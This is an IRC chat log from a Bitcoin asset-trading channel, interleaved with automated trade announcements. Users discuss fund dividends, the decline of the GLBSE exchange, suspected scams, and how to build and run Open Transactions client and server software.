[GLBSE] [PUREMINING] 4 @ 0.101 = 0.404 BTC [-] Oct 01 00:37:17 [GLBSE] [PUREMINING] 3 @ 0.10045 = 0.3014 BTC [-] Oct 01 00:37:19 [GLBSE] [PUREMINING] 4 @ 0.10035 = 0.4014 BTC [-] Oct 01 00:37:20 [GLBSE] [PUREMINING] 22 @ 0.10015 = 2.2033 BTC [-] Oct 01 00:37:21 [MPEX] [S.MPOE] 18350 @ 0.00036436 = 6.686 BTC [-] Oct 01 00:37:22 [GLBSE] [PUREMINING] 6 @ 0.09802 = 0.5881 BTC [-] Oct 01 00:37:23 [MPEX] [S.MPOE] 5250 @ 0.0003636 = 1.9089 BTC [-] Oct 01 00:37:24 [GLBSE] [PUREMINING] 30 @ 0.098001 = 2.94 BTC [-] Oct 01 00:37:25 [GLBSE] [PUREMINING] 14 @ 0.092 = 1.288 BTC [-] Oct 01 00:37:26 [GLBSE] [PUREMINING] 2 @ 0.09002 = 0.18 BTC [-] Oct 01 00:37:27 [GLBSE] [PUREMINING] 10 @ 0.09 = 0.9 BTC [-] Oct 01 00:39:07 [GLBSE] [FDBF] 6 @ 0.149253 = 0.8955 BTC [+] Oct 01 00:41:22 Ehh, that trade must be my shares, 6 shares closer to GLBSE outdoors Oct 01 00:42:57 :D my shares at .15 will come next Oct 01 00:43:06 PsychoticBoy: :) Oct 01 00:44:07 I don't understand buyers sometimes, two hours before he/she would have got the dividends as well Oct 01 00:44:18 indeed, suckers Oct 01 00:44:20 33 shares left, and I'm GLBSE free Oct 01 00:44:38 maybe that's when payment cleared or who knows Oct 01 00:44:40 I do think GLBSE will survive Oct 01 00:44:42 because as soon as dividend is paid, price drops = to dividend payment Oct 01 00:44:50 in a liquid market at least Oct 01 00:45:02 slippage on glbse is 10x any dividends anyway Oct 01 00:45:10 Bugpowder: not here - I sold 5 shares just before and 6 shared just after the dividend, same price Oct 01 00:45:25 in a liquid market where people are paying attention Oct 01 00:45:37 I paid 0.00155 a share Oct 01 00:45:43 like an real stock market Oct 01 00:45:43 div Oct 01 00:45:58 0.1% ? Oct 01 00:46:10 1.1% Oct 01 00:46:17 no more than 1% Oct 01 00:46:22 (or my spreadsheet is wrong) Oct 01 00:46:22 .py 0.149253/ 0.00155 Oct 01 00:46:23 96.2922580645 Oct 01 00:46:32 um Oct 01 00:46:37 .py 0.00155 / 0.149253 Oct 01 00:46:38 0.0103850508867 Oct 01 00:46:40 aha Oct 01 00:47:22 not bad for a fund Oct 01 00:47:44 per month this is ? Oct 01 00:47:57 better than most funds like DMC ( not a mining company more a fund) BMF, M.ETF etc Oct 01 00:48:04 weekly Oct 01 00:48:10 a weekly it's pretty good yes. Oct 01 00:48:23 MPBOR is 5.1% atm, but that involves some risk. Oct 01 00:48:27 difficult to compare risk profiles. Oct 01 00:48:49 FDBF is less risk more mining profit, some loans Oct 01 00:48:53 What's good here is that even the recent loan defaults don't affect the dividends Oct 01 00:49:12 We re going to put up a motion tpo buy BTCFPGA asic miners Oct 01 00:49:13 Just the NAV and future liquidity usable by the fund Oct 01 00:49:23 Mircea, I think you should make everything a bit simpler with your bonds and stocks... Oct 01 00:49:24 OneEyed how's that work ? Oct 01 00:49:31 Cylta anything specific ? Oct 01 00:49:33 [GLBSE] [BFLS.RIG] 1 @ 0.6779 BTC [-] Oct 01 00:49:54 I guess his IceHill investment is what did him in... https://docs.google.com/spreadsheet/pub?key=0Ao892S4MOoDZdGZSbjJVd1ZTbFVLZE5aRE95bE91NVE&gid=1 Oct 01 00:49:54 mircea_popescu: a defaulting loan doesn't affect the existing number of shares of GLBSE assets, only the net value of the fund Oct 01 00:50:04 indeed Oct 01 00:50:16 OneEyed so dividend not linked to nav ? Oct 01 00:50:30 also defaulted loans are repaired by the growt fund Oct 01 00:50:43 Nope, AFAICS dividends for the fund are made of dividends of the held assets Oct 01 00:50:50 da fuck is icehikll Oct 01 00:50:51 Right PsychoticBoy ? Oct 01 00:50:55 yep Oct 01 00:51:01 mostly Oct 01 00:51:04 so then if something defaults, less dividends. Oct 01 00:51:15 and repaid laons/ interest Oct 01 00:51:17 If an asset defaults, less dividends. If a loan defaults, less liquidity Oct 01 00:51:21 Wait -- what? What's Icehill? Please pardon us for having to make so many early announcements. Icehill is the name for what will be a publicly registered company in Iceland. Icehill handles all the implementations of software designed by RingCoin (Kronos, Hermes, ZipConf, and other projects in queue). It is not registered right now. The project leader is heading to Iceland shortly to talk to a lawyer working for Iceland's do Oct 01 00:51:24 OneEyed aha Oct 01 00:51:36 (and less future investments, less fund growth, etc.) Oct 01 00:51:37 4000BTC loss on Icehill Oct 01 00:51:38 Bugpowder o, ofcourse kronos bs did him in Oct 01 00:51:48 you want me to have the girl dig up the posts where she was telling him so ? Oct 01 00:51:56 weeks ago or w/e Oct 01 00:52:03 We are very transperant (FDBF) we have NO secrets Oct 01 00:52:32 If I change my mind about GLBSE, I'll buy FDBF again, but probably for lower than I sold it :) Oct 01 00:52:37 we are NOT stealing your precious coins, we are really investing them Oct 01 00:52:47 he had 86 btc in bvps ?! Oct 01 00:52:55 not me Oct 01 00:53:00 nono, kludge Oct 01 00:53:21 no 11 btc Oct 01 00:53:29 sold for ~6 Oct 01 00:53:29 1k in tygrr... nefario sure helped him Oct 01 00:54:00 Simple explanation at least would be nice. For example: bonds get everything first, but only defined piece of profit. Stocks get the rest of profit. Oct 01 00:54:36 kludge is feeling the pinch Oct 01 00:54:40 wait, he had 86 btc in bvps that was STOLEN !? Oct 01 00:54:45 http://www.youtube.com/watch?v=NYeLrcWFitY Oct 01 00:54:57 some poeple get away with everything Oct 01 00:54:59 Cylta a, but it's built like this for a reason. Oct 01 00:55:04 people Oct 01 00:55:08 That was my favorite trading video of all time Oct 01 00:56:04 Bugpowder you know the one where athene noob gets owned in poker tourney ? Oct 01 00:56:12 nop Oct 01 00:56:25 the best part about that video is he blows up his account Oct 01 00:56:31 Mircea I understand the reason, but I only mean that this explanation is shorter :-) Oct 01 00:56:34 then SP rallies the next day hard Oct 01 00:56:46 would have made profit if he didn't get margined Oct 01 00:57:31 [GLBSE] [BTC-MINING] 3 @ 0.97 = 2.91 BTC [+] Oct 01 00:57:40 Cylta yea, i think you pretty much got it. bonds get x% first, then shareholders. if theres a loss bonds pay. Oct 01 00:57:45 Bugpowder :D Oct 01 00:58:27 I only played in one tourney. Won a 29 seater, made $1000 at Red Rocks. Quit while ahead Oct 01 00:58:45 seals doesn't count Oct 01 01:00:35 lemem dig it Oct 01 01:01:22 [GLBSE] [COGNITIVE] 1 @ 0.49979999 BTC [+] Oct 01 01:01:28 http://www.youtube.com/watch?v=qwYLuHOsLks Oct 01 01:02:21 [MPEX] [S.MPOE] 2150 @ 0.0003636 = 0.7817 BTC [-] Oct 01 01:02:23 yabmc is also sour is it ? Oct 01 01:02:47 [GLBSE] [COGNITIVE] 1 @ 0.4998 BTC [+] Oct 01 01:05:20 [GLBSE] [COGNITIVE] 4 @ 0.5 = 2 BTC [+] Oct 01 01:07:32 [GLBSE] [GSDPT] 2 @ 0.0034 = 0.0068 BTC [+] Oct 01 01:08:08 [GLBSE] [GSDPT] 180 @ 0.0034 = 0.612 BTC [+] Oct 01 01:08:10 [GLBSE] [PLATINUM] 10 @ 0.00999999 = 0.1 BTC [+] Oct 01 01:25:37 [GLBSE] [ASICMINER] 2 @ 0.10300001 = 0.206 BTC [-] Oct 01 01:25:39 [GLBSE] [ASICMINER] 1 @ 0.103 BTC [-] Oct 01 01:25:40 [GLBSE] [ASICMINER] 2 @ 0.10120001 = 0.2024 BTC [-] Oct 01 01:25:41 [GLBSE] [ASICMINER] 10 @ 0.1012 = 1.012 BTC [-] Oct 01 01:25:42 [GLBSE] [ASICMINER] 1 @ 0.10115 BTC [-] Oct 01 01:25:43 [GLBSE] [ASICMINER] 1 @ 0.1011 BTC [-] Oct 01 01:25:44 [GLBSE] [ASICMINER] 1 @ 0.101 BTC [-] Oct 01 01:25:45 [GLBSE] [ASICMINER] 332 @ 0.101 = 33.532 BTC [-] Oct 01 01:26:19 [GLBSE] [MOVETO.FUND] 1 @ 0.87999999 BTC [+] Oct 01 01:26:20 [GLBSE] [MOVETO.FUND] 34 @ 0.88 = 29.92 BTC [+] Oct 01 01:26:22 [GLBSE] [MOVETO.FUND] 5 @ 0.88 = 4.4 BTC [+] Oct 01 01:27:28 [MPEX] [S.MPOE] 24300 @ 0.00036092 = 8.7704 BTC [-] Oct 01 01:30:52 OneEyed btw were you invested in hashking ? Oct 01 01:32:37 mircea_popescu: yeah, for around 27 BTC Oct 01 01:33:00 not as terrible as many. Oct 01 01:33:34 mircea_popescu: I pressed charges when he didn't answer by PM nor reimburse me (it's free to start criminal charges here, no need for a lawyer) Oct 01 01:33:46 And puff, magic, I got reimbursed less than one hour after I told him so Oct 01 01:33:52 that's the case pretty much everywhere. Oct 01 01:34:11 But, according to his PM (since he now answered my PM), I was next in line anyway Oct 01 01:34:13 you just need to get your lazy ass to the da's office/police station and file. Oct 01 01:34:17 So I didn't pursue the charges Oct 01 01:34:31 mircea_popescu: not even, a simple letter is enough, which describes the facts Oct 01 01:34:44 well that'd be fileing Oct 01 01:34:52 Yup Oct 01 01:34:52 you can file by letter in the us too. Oct 01 01:35:36 And when the DA will get back to me, I'll just drop the charges and won't confirm them since the issue is now moot Oct 01 01:36:23 yeah. in 2013 sometime Oct 01 01:36:25 summer-ish Oct 01 01:36:34 Eheh, no, this part is quite fast usually, 3 or 4 weeks Oct 01 01:37:12 a, good for them then Oct 01 01:37:25 i thought france was horrible Oct 01 01:37:27 Since it may start the investigation by the cybercrime police unit, it must be fast. The part after the evidence has been gathered takes much more time, before the actual prosecution happens Oct 01 01:37:49 mircea_popescu: it is to get a final decision Oct 01 01:38:01 mircea_popescu: but the investigation gets started pretty fast usually Oct 01 01:38:17 AFK, talk to you later, 'night Oct 01 01:38:18 these must be the sarkozy improvements Oct 01 01:38:20 later. Oct 01 01:41:15 [GLBSE] [SS] 1 @ 0.0144 BTC [-] Oct 01 01:41:47 pretty sure I was the first person to call usagi a scammer Oct 01 01:41:57 clearly I deserve some form of bounty Oct 01 01:42:17 [GLBSE] [SS] 1 @ 0.01424 BTC [-] Oct 01 01:43:11 [GLBSE] [SS] 10 @ 0.0113 = 0.113 BTC [-] Oct 01 01:45:19 dub i can't give you one, EskimoBob is already getting all of it. Oct 01 01:45:40 [GLBSE] [SS] 88 @ 0.0112 = 0.9856 BTC [-] Oct 01 01:45:43 usagi did a runner? Oct 01 01:45:54 Obsi just a little imploding Oct 01 01:46:09 seems everything on GLBSE is Oct 01 01:46:25 ;;seen usagi Oct 01 01:46:25 usagi was last seen in #bitcoin-assets 4 hours, 53 minutes, and 20 seconds ago: Patrick's fund has nothing to do with NYAN.A tho. Oct 01 01:46:27 bitcoin jenga! Oct 01 01:46:28 everything but gigamining Oct 01 01:46:52 even giga is low off it's highs Oct 01 01:47:02 look at volume of everything Oct 01 01:47:18 now's your chance to make mpex usable mircea_popescu Oct 01 01:47:18 well pirate sucks out most of the money Oct 01 01:47:27 then mining stocks deacying Oct 01 01:47:32 then SEC investigation Oct 01 01:47:42 Obsi ty, but it doesn't seem like anyone has a choice. glbse is going away. now's everyone's change to learn gpg. Oct 01 01:47:43 I don't think GLBSE is going to survive Oct 01 01:48:09 ;;seen nefario Oct 01 01:48:09 nefario was last seen in #bitcoin-assets 6 days, 2 hours, 48 minutes, and 10 seconds ago: Those assets are not listed or traded anymore Oct 01 01:48:11 If gigamining bails, its game over Oct 01 01:48:27 that is the only reason I have assets there Oct 01 01:48:31 who wow ow wo My asset ABM is real and FDBF is real Oct 01 01:48:34 Bugpowder doesn't really look like he'll bail. Oct 01 01:49:12 PsychoticBoy very hard life for a fund man. Oct 01 01:49:24 yes :( Oct 01 01:49:26 scams are probably usually looking for "unsophisticated investors" so hopefully will tend to flock to the insecure but lowest common denominator appeal web-based platforms Oct 01 01:49:37 knotwork you think ? Oct 01 01:49:42 I hope Oct 01 01:50:03 hey, you markm on the forum ? Oct 01 01:50:08 they will go wherever they are allowed to list Oct 01 01:50:11 o tyes you are Oct 01 01:50:16 well, how's ot coming along ? Oct 01 01:50:19 yes, WHOIS knotwork.com, WHOIS knotwork.net Oct 01 01:50:48 so usagi is ascmmer in the eyes of the community Oct 01 01:50:52 You could join us in #opentransactions to watch progress live Oct 01 01:50:56 scammer* Oct 01 01:51:15 PsychoticBoy well, he's just an awful manager Oct 01 01:51:22 knotwork ya but i hate multi channing Oct 01 01:51:29 Mostly so far though there are so few people with clients that most activity on the/my (the only) server is using me as data entry clerk Oct 01 01:51:43 haha Oct 01 01:51:50 is there a reason OT couldn't be made decentralized and fully P2P? Maybe using the blockchain to agree on things Oct 01 01:51:53 almost the same, btc gone in a scam of awful management results in the same: no btc Oct 01 01:51:59 *or Oct 01 01:52:01 i was talking with da2ce773 a while bakc about getting a test server oince the thing is production ready Oct 01 01:52:06 like the Brits tell me, please send #### of asset Y to Martians, Martians tell me please send so many of asset X to Brits, etc Oct 01 01:52:20 :) Oct 01 01:52:27 but im of to bed, good night all Oct 01 01:52:30 nn Oct 01 01:52:38 midnightmagic: knotwork has been running a server for ages now :) Oct 01 01:52:38 [MPEX] [S.MPOE] 16733 @ 0.00036092 = 6.0393 BTC [-] Oct 01 01:52:39 [MPEX] [S.MPOE] 12694 @ 0.00035878 = 4.5544 BTC [-] Oct 01 01:52:42 PsychoticBoy well he does misrepresent his asset values Oct 01 01:52:46 ** mircea_popescu Oct 01 01:53:03 da2ce773 wouldja say it actually is at a point where it can be deployed ? Oct 01 01:53:24 or, they tell me what they want their scripted offers to be, like have the script offer to buy at 97% on scale 1, 98% on scale 10, 99% on scale 100 Oct 01 01:53:40 why isn't that all automated? Oct 01 01:53:41 mircea_popescu, is this accurate: http://polimedia.us/bitcoin/faq.html#13 ? the bit about affiliates and a 5 btc rebate? Oct 01 01:53:42 knotwork how would i connect to the server ? Oct 01 01:54:05 yes Ignatius-otc, you might also want to give a look at Oct 01 01:54:09 .g mpex dev talk Oct 01 01:54:10 mircea_popescu: http://trilema.com/2012/mpex-devtalk/ Oct 01 01:54:14 with a client (or using ot script language). what operating system do you use? Oct 01 01:54:22 hmm... it isn't a just a clean 'deploy and everything will work forever stage'.. there will be bugs, and it will need maintance/FellowTraveler/I will have to develop patches for your issues. Oct 01 01:54:40 knotwork ubuntu Oct 01 01:54:51 almost everyday we work with knotwork solving issues. Oct 01 01:55:00 *hence his server is still up and running. Oct 01 01:55:31 ok well in ubunto you should be able to git clone the OT repo and the Moneychanger repo and build OT using configure etc and Moneychanger using netbeans Oct 01 01:55:37 da2ce773 what'd be a reasonable server to run it on ? do you have it on a vps atm ? Oct 01 01:55:42 or probably use a pre-build Moneychanger jar Oct 01 01:55:52 knotwork i don't want to build the server tho, just a client Oct 01 01:55:57 mircea_popescu: you prob want 2 dedi cores. Oct 01 01:56:04 I would never run financial server on third party hosting Oct 01 01:56:14 knotwork this'd be a test thing Oct 01 01:56:20 it is on my machine right here behind my steel plated door Oct 01 01:56:32 o, you actually have money on it as it is ? Oct 01 01:56:37 ya Oct 01 01:56:43 I have some dBTC Oct 01 01:56:52 i see Oct 01 01:57:02 mircea, the OT build builds the .so dynamic libs that the client needs to dynamically link to Oct 01 01:57:30 the guts are all in the API libraries, the actual GUI client just uses the java API library which is compiled from C++ code Oct 01 01:57:39 you use java ?! Oct 01 01:57:49 the windows client is almost super-easy to install now (on windows). Oct 01 01:57:51 the test/reference GUI is in java Oct 01 01:58:01 well that sucks Oct 01 01:58:17 however the OT also comes with "opentxs" command that executes OT script language Oct 01 01:58:22 :S well java dosn't suck if you do it right... look at multibit Oct 01 01:58:28 so you can do everything from the commandline in OT script Oct 01 01:58:46 opentxs command also goes into OT shell type mode if not told a command to run Oct 01 01:59:48 basically installing OT having configured it with --with-java will put a java otapi library in /usr/local/lib Oct 01 02:00:10 hm Oct 01 02:00:21 then when you fire up the java client you tell it where to find that otapi-java library (the dir, /usr/local/lib) and it uses it Oct 01 02:00:38 (and remembers in future where to look for the lib) Oct 01 02:01:33 oh and what confuses many people is you also have to tell it an image path, to an image it is to display any time it asks for password, so no phisher will know what image to show you to make a convincing fake password-entry popup to pretend is coming from your OT Oct 01 02:02:13 hm Oct 01 02:02:13 there is a few levels to OT. c++ (otlib) <- the core of OT, everything depends on this. c++ (otapi) <- bindings to the core. java (otapi-java) <- java bindings for the api Oct 01 02:03:04 the password crap is a real pain for scripts Oct 01 02:03:18 should be solved soon tho.... Oct 01 02:03:19 :S Oct 01 02:03:39 what level OT are you? Oct 01 02:03:44 tom cruise level? Oct 01 02:03:51 I cannot run the offers scripts for people in cron because even with setting up the gnome keyring crap the keyring sometimes does not respond properly plus seems to lose everything at reboot too Oct 01 02:03:53 dub: lol phantom level Oct 01 02:04:42 so there's no simple way for me to talk to the ot server outside of installing soem (java including) client which i'd have to build ? Oct 01 02:05:12 no need for the java client you could use commandline thus only need OT itself Oct 01 02:05:26 hmm... or just binding to the c++ code yourself Oct 01 02:05:39 someone recently built a package for one kind of Linux but not for Ubunto yet I think Oct 01 02:05:49 and i depend upon this client for keeping my identity secure ? Oct 01 02:05:57 but if you want to automate things any-way you are going to need to do a littlebit of programing. Oct 01 02:06:27 the client could always talk via tor or localhost, or whaterever. Oct 01 02:06:30 the client encrypts a private key for each nym you create so yes it does the securing of the nyms aka identities Oct 01 02:06:37 is uses openssl Oct 01 02:06:50 so one could also use openssl directly to deal with them Oct 01 02:07:01 so why can't i just pop an openssl up and talk to your server ? Oct 01 02:07:05 aha Oct 01 02:07:34 oh yeah... cypro is built-into OT from the ground up... so that is a forgoan conclusion. Oct 01 02:07:41 the talk with the server is using ssl encrpyted XZeroMQ transport protocol Oct 01 02:08:13 which I think itself uses tcp though might also be capable of udp we use it in tcp mode though I think Oct 01 02:08:29 ZMQ - ZeroMQ Oct 01 02:08:52 they claim faster than tcp Oct 01 02:09:04 but why nton protocol, when you only need n to 1 ? Oct 01 02:09:14 oh okay so maybe not layered on top of tcp then Oct 01 02:09:36 we maybe will use n-to-n for server federating? Oct 01 02:09:37 well anyway, we just pass it over to zmq and forget about it... Oct 01 02:09:48 we use zmq 2.0 not the 3.0 branch Oct 01 02:09:56 or for auto echo of all receipts sent to client to also go to a DHT ? Oct 01 02:10:38 also ZMQ supposedly handles packeting the messages etc so you can have a message up to some huge size like 2 gigs or something Oct 01 02:10:55 you just say send this and it worries about how Oct 01 02:11:04 base64 encoded....ouch Oct 01 02:11:08 ouch indeed Oct 01 02:11:15 to OT itself storage and transport are each encapsulated Oct 01 02:11:18 what the fuck do you do on server end if ppl start sending 2gb lol Oct 01 02:11:42 [MPEX] [O.BTCUSD.C120T] 10 @ 0.22209339 = 2.2209 BTC [-] Oct 01 02:11:50 mircea_popescu: it was a joke when knotwork was doing a sync with an account that had a automated trading bot. Oct 01 02:11:52 so it doesnt care what is in that black box, pull out ZMG substitute email and all OT should maybe need is to use much much longer timeouts to wait for replies Oct 01 02:12:20 s/ZMG/ZMQ/ Oct 01 02:14:31 anyway, on Ubunto you should just be able to install prepackaged for ubunto protobuf protocol buffers maybe which it also needs, and build and install ZMQ which likely is not part of Ubunto normal repos, oh and boost which is also in standard repos Oct 01 02:14:39 you probably already have openssl installed Oct 01 02:15:00 if you are used to the autotools build system it is easy to build Oct 01 02:16:07 aha Oct 01 02:16:33 at least it is easy once you have ZMQ and protobufs and boost already Oct 01 02:16:52 no wait, it also wants chaiscript oops you have to get that from their git Oct 01 02:17:30 latest version of their old version, their new major version number starts needing weird extra newfangled C extentions or something that normal C++ does not have Oct 01 02:18:12 though we will soon move to that I guess for some of those newfangled stuff Oct 01 02:18:41 anyway one of the builders used Ubunto I believe so likely the instructions for Ubunto are pretty good Oct 01 02:18:52 Me I use Fedora but that is pretty similar Oct 01 02:19:07 Who wrote MPEX code? Oct 01 02:19:28 whoever did can likely get OT working Oct 01 02:19:47 unless all they know is shell script and HTML Oct 01 02:20:33 knotwork it's not as much a problem of not being able to get it working Oct 01 02:20:41 as it is a problem of the userbase. Oct 01 02:20:51 people in general are barely able to get simple gpg off the ground Oct 01 02:20:52 is that dashing pirate shown at http://trilema.com/2012/mpex-devtalk/ mircea? Oct 01 02:21:05 you mean top of page ? Oct 01 02:21:20 Do I seem like I give a **** about userbase? ;) :D Oct 01 02:21:37 userbase can videochat with broker at $75/hour Oct 01 02:21:41 knotwork s.mpoe made ~5k btc in september out of userbase :) Oct 01 02:22:11 that wasn't userbase that was "broker material" population Oct 01 02:22:25 possibly Oct 01 02:22:53 https://bitcointalk.org/index.php?topic=82869.msg1234369#msg1234369 Oct 01 02:22:55 moveto is closing Oct 01 02:23:16 Actually also my first attempt to use Open Transactions was inside my dealer-bots on IRC Oct 01 02:23:20 knotwork: I think that it is more-simple than your gpg app-thing that you had. Oct 01 02:23:28 * mircea_popescu ^^ Oct 01 02:23:32 so people could simply right here in IRC exchange various cryptocurrencies Oct 01 02:23:51 since userbase could give two shits about security why not IRC? Oct 01 02:24:00 um Oct 01 02:24:05 and if they did care, why then I could add gribble style auth Oct 01 02:24:32 mircea_popescu: the java test-gui is 'good enough' for most use-cases... Oct 01 02:24:39 *for the end user Oct 01 02:24:53 java is a horror, always coming up with new 0days Oct 01 02:25:19 mircea_popescu: it isn't so bad if you don't bind it to your web-browsers. Oct 01 02:25:22 mostly though my userbase would be playing from inside some kind of game client, so I would add commands in to whichever game server to call out to finace system Oct 01 02:25:45 aha Oct 01 02:26:37 I have shell scripts that IRC bots use to talk to *coin daemons to do trade between coin types for example Oct 01 02:27:05 those same shell scripts can be run by system call in perl player-bots inside Crossfire RPG game Oct 01 02:27:27 [GLBSE] [ZETA-MINING] 1 @ 0.17499997 BTC [+] Oct 01 02:27:28 [GLBSE] [ZETA-MINING] 1 @ 0.17499998 BTC [+] Oct 01 02:27:41 similarly it ought not be hard to give CoffeeMUD the ability to call out Oct 01 02:28:04 all such things though would, just like websites, sacrifice the player/visitor's ability to have their own private key Oct 01 02:28:25 instead the server would create a nym per player to use on its end Oct 01 02:28:55 or even just use a banker nym and an account per player controlled by the banker Oct 01 02:29:09 [GLBSE] [MOORE] 3 @ 0.47999999 = 1.44 BTC [+] Oct 01 02:29:37 mircea did you ever glance at http://galaxies.mygamesonline.org/digitalisassets.html ? Oct 01 02:29:53 [GLBSE] [GIGAMINING] 1 @ 0.60959 BTC [-] Oct 01 02:29:54 [GLBSE] [GIGAMINING] 4 @ 0.6098 = 2.4392 BTC [+] Oct 01 02:30:08 !ticker obsi.hrpt Oct 01 02:30:13 It is just a really primitive HTML put out by shell scripts but is all I have made so far as a way for me to try to see waht the heck is going on with the various assets Oct 01 02:30:22 [GLBSE:OBSI.HRPT] [Bid: 0.02770736] [Ask: 0.0395] [Spread: 0.01179264] [Last: 0.049] [24hVol: 18.39939738] [7dAvg: 0.05122539] Oct 01 02:30:36 i vaguely recall that Oct 01 02:31:15 I suppose in normal acronyms its an attempt to compute NAVs for everyone Oct 01 02:31:19 *throogh 3 or more step trades Oct 01 02:31:35 [GLBSE] [MOORE] 1 @ 0.49 BTC [+] Oct 01 02:31:36 but of course it is confounded by not knowing what assets certain assets such as "BTC" and "DVC" and so on actually own Oct 01 02:32:07 in theory it should add up all assets "BTC" owns and divide by number of BTC that exist Oct 01 02:32:09 "I own 5768 shares, which leaves 1472 shares out in the wild" Oct 01 02:32:40 in reality one cannot rely upon "BTC" to "back" itself nor to be able to be "liquidated" for its assets Oct 01 02:33:34 so in practice for BTC and DVC and IXC etc - the chains where I do not know what they actually own - I have to go get market prices and plug those in Oct 01 02:34:40 but for assets that every single item of them is on my server I can try to add up their value by looking at the reserves (assets) they hold Oct 01 02:35:30 thus for example the Martians hold a lot more stuff than the Canadians so Martian BotCoin evaluates as worth more than Canadian Digital Notes Oct 01 02:37:15 [MPEX] [S.MPOE] 700 @ 0.00035837 = 0.2509 BTC [-] Oct 01 02:38:22 smickles why do you keep spelling principal "principle" ? Oct 01 02:40:07 lol well boys, I'm off to the gym (gotta keep my ass looking good if you want to be a OT developer)... Oct 01 02:40:41 lol gl Oct 01 02:41:18 smickles-- Oct 01 02:49:20 [GLBSE] [NASTY] 1 @ 0.42212013 BTC [+] Oct 01 02:49:21 [GLBSE] [NASTY] 3 @ 0.42212012 = 1.2664 BTC [-] Oct 01 02:50:59 [GLBSE] [NASTY] 3 @ 0.42212013 = 1.2664 BTC [+] Oct 01 02:51:00 [GLBSE] [NASTY] 1 @ 0.42212012 BTC [-] Oct 01 02:53:14 [GLBSE] [BFLS.RIG] 2 @ 0.678 = 1.356 BTC [+] Oct 01 02:54:08 ;;seen usagi Oct 01 02:54:09 usagi was last seen in #bitcoin-assets 6 hours, 1 minute, and 3 seconds ago: Patrick's fund has nothing to do with NYAN.A tho. Oct 01 02:54:28 ;;later tell usagi yep Oct 01 02:54:29 The operation succeeded. Oct 01 03:01:20 [GLBSE] [FPGAMINING] 1 @ 0.4948 BTC [+] Oct 01 03:01:21 [GLBSE] [FPGAMINING] 4 @ 0.495 = 1.98 BTC [+] Oct 01 03:01:44 [GLBSE] [MU] 1 @ 0.15001001 BTC [-] Oct 01 03:01:45 [GLBSE] [MU] 1 @ 0.15001 BTC [-] Oct 01 03:02:29 [MPEX] [S.MPOE] 12073 @ 0.00035837 = 4.3266 BTC [-] Oct 01 03:02:31 [MPEX] [S.MPOE] 2427 @ 0.00036276 = 0.8804 BTC [+] Oct 01 03:04:10 [GLBSE] [NASTY] 4 @ 0.42220001 = 1.6888 BTC [+] Oct 01 03:04:12 [GLBSE] [NASTY] 1 @ 0.42210001 BTC [-] Oct 01 03:05:56 [GLBSE] [NASTY] 1 @ 0.42210001 BTC [-] Oct 01 03:07:36 [GLBSE] [NASTY] 3 @ 0.422 = 1.266 BTC [-] Oct 01 03:10:09 [GLBSE] [BFLS.RIG] 3 @ 0.69 = 2.07 BTC [+] Oct 01 03:10:39 http://www.officialwebsiteofamerica.com/ Oct 01 03:11:34 [GLBSE] [BFLS.RIG] 5 @ 0.75 = 3.75 BTC [+] Oct 01 03:13:35 [GLBSE] [BFLS.RIG] 4 @ 0.7989 = 3.1956 BTC [+] Oct 01 03:15:08 [GLBSE] [BFLS.RIG] 6 @ 0.79898 = 4.7939 BTC [+] Oct 01 03:16:36 [GLBSE] [BFLS.RIG] 13 @ 0.79899 = 10.3869 BTC [+] Oct 01 03:17:37 [GLBSE] [BFLS.RIG] 1 @ 0.799 BTC [+] Oct 01 03:19:14 sounds like maddox dub Oct 01 03:19:14 [GLBSE] [BFLS.RIG] 10 @ 0.7999 = 7.999 BTC [+] Oct 01 03:20:28 [GLBSE] [BFLS.RIG] 1 @ 0.84 BTC [+] Oct 01 03:20:51 [GLBSE] [NASTY] 3 @ 0.42210002 = 1.2663 BTC [+] Oct 01 03:20:52 [GLBSE] [NASTY] 1 @ 0.422 BTC [-] Oct 01 03:20:53 [GLBSE] [NASTY] 2 @ 0.422 = 0.844 BTC [-] Oct 01 03:21:28 [GLBSE] [BFLS.RIG] 10 @ 0.84999 = 8.4999 BTC [+] Oct 01 03:22:19 [GLBSE] [BFLS.RIG] 3 @ 0.865 = 2.595 BTC [+] Oct 01 03:23:41 [GLBSE] [BFLS.RIG] 1 @ 0.88 BTC [+] Oct 01 03:24:20 [GLBSE] [NASTY] 1 @ 0.42220003 BTC [+] Oct 01 03:24:21 [GLBSE] [NASTY] 1 @ 0.42220002 BTC [-] Oct 01 03:24:53 [GLBSE] [BFLS.RIG] 2 @ 0.89 = 1.78 BTC [+] Oct 01 03:25:38 [GLBSE] [NASTY] 1 @ 0.42220002 BTC [-] Oct 01 03:27:03 [GLBSE] [BFLS.RIG] 1 @ 0.898 BTC [+] Oct 01 03:27:13 [GLBSE] [BTC-MINING] 2 @ 0.97 = 1.94 BTC [+] Oct 01 03:27:37 [GLBSE] [GSDPT] 1000 @ 0.0034 = 3.4 BTC [+] Oct 01 03:27:47 [MPEX] [S.MPOE] 5223 @ 0.00036276 = 1.8947 BTC [+] Oct 01 03:28:37 [GLBSE] [BFLS.RIG] 2 @ 0.98 = 1.96 BTC [+] Oct 01 03:29:29 ahh, so let's stir the pot a little. Oct 01 03:30:10 [GLBSE] [ZETA-MINING] 4 @ 0.17499998 = 0.7 BTC [+] Oct 01 03:30:11 [GLBSE] [ZETA-MINING] 8 @ 0.175 = 1.4 BTC [+] Oct 01 03:31:40 I love how he talks about shareholders' privacy but then posts someone's passport Oct 01 03:32:11 mircea_popescu: that seems suitably stirred Oct 01 03:32:15 can I have my spoon back? Oct 01 03:32:19 [GLBSE] [BTCASS_BOND_A] 9 @ 0.148 = 1.332 BTC [-] Oct 01 03:32:21 [GLBSE] [BTCASS_BOND_A] 3 @ 0.149 = 0.447 BTC [+] Oct 01 03:32:45 [GLBSE] [SYNERGY] 1 @ 0.09000001 BTC [-] Oct 01 03:32:46 [GLBSE] [SYNERGY] 1 @ 0.09 BTC [-] Oct 01 03:32:58 mircea_popescu: http://www.youtube.com/watch?v=JBV9Hdroh70 Oct 01 03:33:21 copumpkin http://polimedia.us/dtng/c/src/134889419169.jpg Oct 01 03:33:43 I see Oct 01 03:33:54 I like the my anus is bleeding one Oct 01 03:34:03 [GLBSE] [YABMC] 2 @ 0.07879999 = 0.1576 BTC [-] Oct 01 03:34:05 [GLBSE] [YABMC] 18 @ 0.0788 = 1.4184 BTC [+] Oct 01 03:35:30 http://www.youtube.com/watch?v=8GkHiU9bMW0 Oct 01 03:36:10 [GLBSE] [NASTY] 3 @ 0.40019999 = 1.2006 BTC [-] Oct 01 03:36:46 [GLBSE] [GIGAMINING] 2 @ 0.6179 = 1.2358 BTC [+] Oct 01 03:36:48 [GLBSE] [GIGAMINING] 1 @ 0.6182 BTC [+] Oct 01 